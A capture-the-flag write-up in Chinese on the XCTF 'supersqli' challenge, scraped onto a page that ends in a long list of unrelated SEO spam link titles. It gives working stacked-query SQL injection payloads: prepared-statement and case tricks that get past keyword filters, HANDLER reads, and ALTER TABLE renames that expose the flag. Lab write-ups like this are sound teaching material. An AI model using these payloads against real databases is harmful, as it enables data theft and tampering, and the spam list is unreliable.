当前位置: 首页 > news >正文

互联网网站基础网络营销软文范例大全800

互联网网站基础,网络营销软文范例大全800,深圳搭建p2p网站,网页设计实验报告3000XCTF_Web_高手进阶区 supersqli supersqli 这里使用谷歌浏览器 拿到题目后,发现是单引号报错字符型注入 用order by语句判断出两个字段:order by 2的时候页面正常回显,order by 3的时候页面出错。 使用union select联合查询,发现…

XCTF_Web_高手进阶区

  • supersqli

supersqli

这里使用谷歌浏览器
拿到题目后,发现是单引号报错字符型注入
在这里插入图片描述
用order by语句判断出两个字段:order by 2的时候页面正常回显,order by 3的时候页面出错。
使用union select联合查询,发现关键字select被正则过滤了
在这里插入图片描述
因此,需要绕过select的过滤
解法一:
(1)堆叠注入/?inject=-1’;show tables --+
在这里插入图片描述
(2)发现了两张表,分别查询两张表中的字段,
/?inject=-1’;show columns from 1919810931114514 --+
在这里插入图片描述
/?inject=-1’;show columns from words --+
在这里插入图片描述
(3)发现了flag在第一个表中,接下来就是要查看flag的内容了。但是select被过滤了,这里可以采用预编译的方式绕过。

?inject=-1';set @sql = CONCAT('sele','ct * from \`1919810931114514\`;');prepare aaa from @sql;EXECUTE aaa;#

在这里插入图片描述
(4)这里用strstr函数过滤了’set’和’prepare’关键词,利用strstr不能区分大小写,将其改为大写即可

/?inject=-1';sEt @sql = CONCAT('sele','ct * from \`1919810931114514\`;');prepArE aaa from @sql;EXECUTE aaa;#

或者

/?inject=-1';sEt @sql = CONCAT('se','lect * from \`1919810931114514\`;');prEpare stmt from @sql;EXECUTE stmt;#

或者

/?inject=-1';use supersqli;set @sql=concat('s','elect * from \`1919810931114514\`');PREPARE pre FROM @sql;EXECUTE pre;--+

在这里插入图片描述
解法二:
handler查询
在查找到有两张表的前提下进行
(1)使用方法:
handler table_name open打开一张表
handel table_name read first读取第一行内容,
handel table_name read next依次获取其它行

/?inject=-1';handler `1919810931114514` open;handler `1919810931114514` read first;#

在这里插入图片描述
解法三:
(1)修改表名和列名,在查找到两个表后,看一下第二个表
在这里插入图片描述
(2)其中有一个列就是data列,是可以进行查询的。所以这里将表1919810931114514名字改为words,flag列名字改为id,就可以查询flag的内容了。

1'; alter table words rename to aaaa;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);#

其中:
alter table words rename to aaaa;先把原来的words表名字改成别的,这个随便
alter table`1919810931114514` rename to words;将表1919810931114514的名字改为words
alter table words change flag id varchar(100);将改完名字后的表中的flag改为id,字符串尽量长点
(3)然后用1’ or 1=1 --+直接就能得到正确结果
在这里插入图片描述

http://www.dt0577.cn/news/8776.html

相关文章:

  • dns 解析错误 网站重庆百度开户
  • 重庆网站建设论坛优化设计六年级上册语文答案
  • 做药品网站有哪些内容百度网盘电脑版官网
  • openshift 做网站德兴网站seo
  • 公司简介ppt模板刷百度关键词排名优化
  • 广西政府网站政务新媒体建设调查百度手机
  • 受欢迎的南昌网站建设百度竞价排名公式
  • 做网站哪些技术淮北网络推广
  • 网站建设客户功能详细要求网站设计师
  • 网站如何做邮箱订阅号seo视频教程汇总
  • 苏州姑苏区建设局网站营销培训班
  • 做网站注册35类哪几个小项推广平台都有哪些
  • 建设银行官方网站买五粮液酒开创集团与百度
  • 做淘宝保健品药品在哪个网站找素材南宁seo排名外包
  • 网站平台建设模板金华百度seo
  • 深圳网站建设与制作公司百度快照怎么没有了
  • 长治一般做一个网站需要多少钱自己有域名怎么建网站
  • 靠比较软件下载大全app网站seo站长工具是什么
  • 多个网站 支付宝接口网站建网站建设网站
  • 网站建设记账机构类网站有哪些
  • wordpress https插件排名优化外包公司
  • php网站开发技术 pdf加强服务保障满足群众急需ruu7
  • 做网站选择系统win10优化大师免费版
  • 做一个租房卖房的网站怎么做百度seo公司兴田德润
  • 增加网站外链百度官方版下载
  • 足球网站怎么做的最新行业动态
  • 新手学网络运营要多久什么是seo搜索
  • 手表网站海外购靠谱吗山东网络推广优化排名
  • 珠海集团网站建设admin5站长网
  • 简述软件开发流程大泽山seo快速排名